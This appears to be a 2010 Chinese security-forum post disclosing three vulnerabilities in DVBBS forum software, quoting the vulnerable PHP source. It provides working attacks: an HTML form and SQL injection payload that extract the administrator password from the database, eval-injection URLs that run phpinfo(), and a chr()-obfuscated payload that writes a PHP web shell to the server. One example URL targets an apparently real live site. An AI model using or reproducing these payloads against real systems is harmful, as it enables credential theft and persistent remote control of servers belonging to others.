作者:T00ls 核心成员 Xhm1n9
时间:2010.8.19
1:joinvipgroup.php //注入
function up_vipuser(){
global $lang,$db,$dv,$userid,$userinfo,$vipgroupuser;
$groupid=$_POST['vipgroupid'];
$btype=$_POST['Btype'];
$vipmoney=$_POST['vipmoney'];
$vipticket=$_POST['vipticket'];
if($groupid==0 or $vipmoney<0 or $vipticket<0){echo "@@";
showmsg($lang['join.info4']);
exit;
}
$issql=$db->scalar("SELECT count(1) FROM {$dv}usergroups WHERE parentgid=5 and usergroupid='".intval($groupid)."'");echo $issql;
if($issql>0 AND ($sql=$db->query("SELECT usergroupid,title,usertitle,groupsetting,grouppic FROM {$dv}usergroups WHERE parentgid=5 and usergroupid='".intval($groupid)."'"))){
while ($arr=$db->fetch_array($sql)){
$vipgroupsetting=explode(",",$arr['groupsetting']);
$upsetting=explode($lang['join.separator1'], $vipgroupsetting[71]);//'升级到该组所需金币数 金币数§点券数§有效天数§最低天数
if($btype==1){echo "???";
$vipmoney=0;
if(intval($upsetting[3])>0){
$mustnum=$upsetting[3]*$upsetting[1]/$upsetting[2];
if($mustnum>0){
$mustnum=number_format($mustnum,0);
}else{
showmsg($lang['join.info5']);
exit;
}
}
if($userinfo['userticket']<$vipticket or $vipticket<$mustnum){
showmsg($lang['join.info6']);
exit;
}
$updats=$vipticket*$upsetting[2]/$upsetting[1];
$updats=intval(number_format($updats,0));
}else{echo "&&&";
$vipticket=0;
if($upsetting[3]>0){
$mustnum=$upsetting[3]*$upsetting[0]/$upsetting[2];
if($mustnum>0){
$mustnum=number_format($mustnum,0);
}else{
showmsg($lang['join.info5']);
exit;
}
}
var_dump($userinfo['usermoney']<$vipmoney);
var_dump($vipmoney<$mustnum);
if($userinfo['usermoney']<$vipmoney || $vipmoney<$mustnum){echo "ri";
showmsg($lang['join.info7']);
exit;
}
$updats=$vipmoney*$upsetting[2]/$upsetting[0];
$updats=intval(number_format($updats,0));
}
if($vipgroupuser===true){echo "%%%";
$db->query("UPDATE {$dv}user SET usergroupid=".$groupid.",userclass='".$arr['usertitle']."',titlepic='".$arr['grouppic']."',usermoney=usermoney-".$vipmoney.",userticket=userticket-".$vipticket.",vip_endtime='".($userinfo['vip_endtime']+$updates*24*3600)."' WHERE userid=".$userid."");
$db->query("UPDATE {$dv}online SET usergroupid='$groupid' Where userid=$userid");
}else{echo "^^^";
$db->query("UPDATE {$dv}user SET usergroupid=".$groupid.",userclass='".$arr['usertitle']."',titlepic='".$arr['grouppic']."',usermoney=usermoney-".$vipmoney.",userticket=userticket-".$vipticket.",vip_endtime='".(TIME_NOW+$updates*24*3600)."',vip_startime='".TIME_NOW."' WHERE userid=".$userid."");
$db->query("UPDATE {$dv}online SET usergroupid='$groupid' Where userid=$userid");
}
..............................................................
$vipmoney变量没有过滤,利用前提是管理员设了vip会员组,有点金币:)
<title>test</title><form name="p_form" id="p_form" method="post" action="http://127.1/dvbbs/joinvipgroup.php?action=upvipuser" enctype="multipart/form-data">
<input id='img_thumb_final' name='vipmoney' type="text" value="0,useremail=123456">
<input id='img_thumb_final' name='vipticket' type="text" value="88">
<input id='img_thumb_final' name='vipgroupid' type="text" value="25">
<input id='img_thumb_final' name='Btype' type="text" value="">
<input name="sub" type="submit" value="提交" />
</form>
<!------------
0,userface=(select password from dv_admin where id=1) where userid=1#
!>
2:cache/static/index_0_0.php //执行漏洞
index.php
if((!$useindexstatic) || (!$useindexstatic_css) || $page>1 || $topicmode>0){
....................................
if($useindexstatic_css && $page < 2 && $topicmode==0){
$this_my_f= ob_get_contents(); //生成缓存文件
ob_end_clean();
to_static_php_file($indexstatic,$this_my_f);
}
...................................
}
写缓存生成的文件里有eval(),但文件顶部没有限制返问
<? eval("\$lang['tpl.str10']=\"{$lang['tpl.str10']}\";");?>
index_0_0.php?lang[tpl.str10]={${phpinfo()}}
3:templates/default/index.tpl.php //执行漏洞
<?
if( !defined('ISDVBBS') ){
header('HTTP/1.0 404 Not Found');
exit;
}
global $imgurl;
if($useindexstatic)
echo '<? eval("\$lang[\'tpl.str10\']=\"{$lang[\'tpl.str10\']}\";");?>';
else
eval("\$lang['tpl.str10']=\"{$lang['tpl.str10']}\";");
?>
.........................
index.php
...........//省略部份代码
if((!$useindexstatic) || (!$useindexstatic_css) || $page>1 || $topicmode>0){
if($useindexstatic_css &&$page < 2 && $topicmode==0){
$useindexstatic= true;
ob_start();
}
else
$useindexstatic= false;
include_once INC_PATH.'DV_Encoding.class.php';
$objenc =& DV_Encoding::GetEncoding($charset);
$lang = load_lang($lang, 'index' );
....................
首页调用模板,但没初始化$lang变量
只要满足if($useindexstatic_css &&$page < 2 && $topicmode==0)条件就能成功
例子:
http://www.flyingcity.cn/bbs/index.php?lang[tpl.str10]={${phpinfo()}}
index.php?lang[tpl.str10]={${phpinfo()}}
index.php?lang[tpl.str10]={${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(120).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(43).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(93).chr(41).chr(63).chr(32).chr(62).chr(39).chr(41).chr(59))}} fputs(fopen('x.php','w+'),'<?eval($_POST[c])?>');